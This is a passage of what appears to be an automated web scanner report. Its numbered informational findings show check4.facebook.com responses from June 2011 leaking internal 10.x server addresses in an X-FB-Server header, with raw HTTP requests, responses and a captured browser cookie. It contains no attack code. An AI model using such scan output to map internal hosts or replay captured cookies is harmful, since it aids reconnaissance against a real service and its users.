User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.176.110
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:36 GMT

/*1308230856,169586798*/

window._ip_w["check4"] = 0;

19.133. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.74.56

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.74.56
X-Cnection: close
Date: Thu, 16 Jun 2011 12:09:55 GMT

/*1308226195,171330104*/

window._ip_w["check4"] = 0;

19.134. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.217.45

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1587192ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.217.45
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:13 GMT

/*1308233953,171366701*/

window._ip_w["check4"] = 0;

19.135. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.199.61

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.199.61
X-Cnection: close
Date: Thu, 16 Jun 2011 16:18:00 GMT

/*1308241080,171362109*/

window._ip_w["check4"] = 0;

19.136. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.155.63

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1636510b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.155.63
X-Cnection: close
Date: Thu, 16 Jun 2011 13:43:02 GMT

/*1308231782,171875135*/

window._ip_w["check4"] = 0;

19.137. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.68.40

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9d94d8b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.68.40
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:44 GMT

/*1308240464,171328552*/

window._ip_w["check4"] = 0;

19.138. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.90.33

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0b8eb68%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.90.33
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:54 GMT

/*1308233334,171334177*/

window._ip_w["check4"] = 0;

19.139. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.213.35

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.213.35
X-Cnection: close
Date: Thu, 16 Jun 2011 16:59:21 GMT

/*1308243561,171889955*/

window._ip_w["check4"] = 0;

19.140. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.4.44

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.4.44
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:39 GMT

/*1308234879,171377708*/

window._ip_w["check4"] = 0;

19.141. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.63.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.63.51
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:42 GMT

/*1308242322,171851571*/

window._ip_w["check4"] = 0;

19.142. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.159.40

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38571b054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.159.40
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:13 GMT

/*1308232093,171876136*/

window._ip_w["check4"] = 0;

19.143. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.54.29

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13f69d6fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.54.29
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:53 GMT

/*1308235193,171324957*/

window._ip_w["check4"] = 0;

19.144. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.118.48

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b6c243ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.118.48
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:53 GMT

/*1308237053,171865648*/

window._ip_w["check4"] = 0;

19.145. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.147.63

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.43.147.63
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:23 GMT

/*1308223343,170627903*/

window._ip_w["check4"] = 0;

19.146. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.206.110

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e6496c58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.206.110
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:48 GMT

/*1308244188,176737902*/

window._ip_w["check4"] = 0;

19.147. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.153.114

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.153.114
Connection: close
Date: Thu, 16 Jun 2011 18:58:27 GMT

/*1308250707,169908594*/

window._ip_w["check4"] = 0;

19.148. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.149.34

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31761806%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.149.34
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:25 GMT

/*1308234265,171349282*/

window._ip_w["check4"] = 0;

19.149. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.125.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.125.45
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:29 GMT

/*1308228989,171343149*/

window._ip_w["check4"] = 0;

19.150. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.52.40

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa0e6822%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.52.40
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:53 GMT

/*1308227753,171324456*/

window._ip_w["check4"] = 0;

19.151. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.101.44

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15d47b8d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.101.44
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:10 GMT

/*1308244810,171337004*/

window._ip_w["check4"] = 0;

19.152. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.10.50

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3791e1e24%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.10.50
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:34 GMT

/*1308242014,171903538*/

window._ip_w["check4"] = 0;

19.153. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.68.34

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.68.34
X-Cnection: close
Date: Thu, 16 Jun 2011 18:22:13 GMT

/*1308248533,171852834*/

window._ip_w["check4"] = 0;

19.154. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.142.38

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.142.38
X-Cnection: close
Date: Thu, 16 Jun 2011 15:05:41 GMT

/*1308236741,171347494*/

window._ip_w["check4"] = 0;

19.155. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.15.50

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
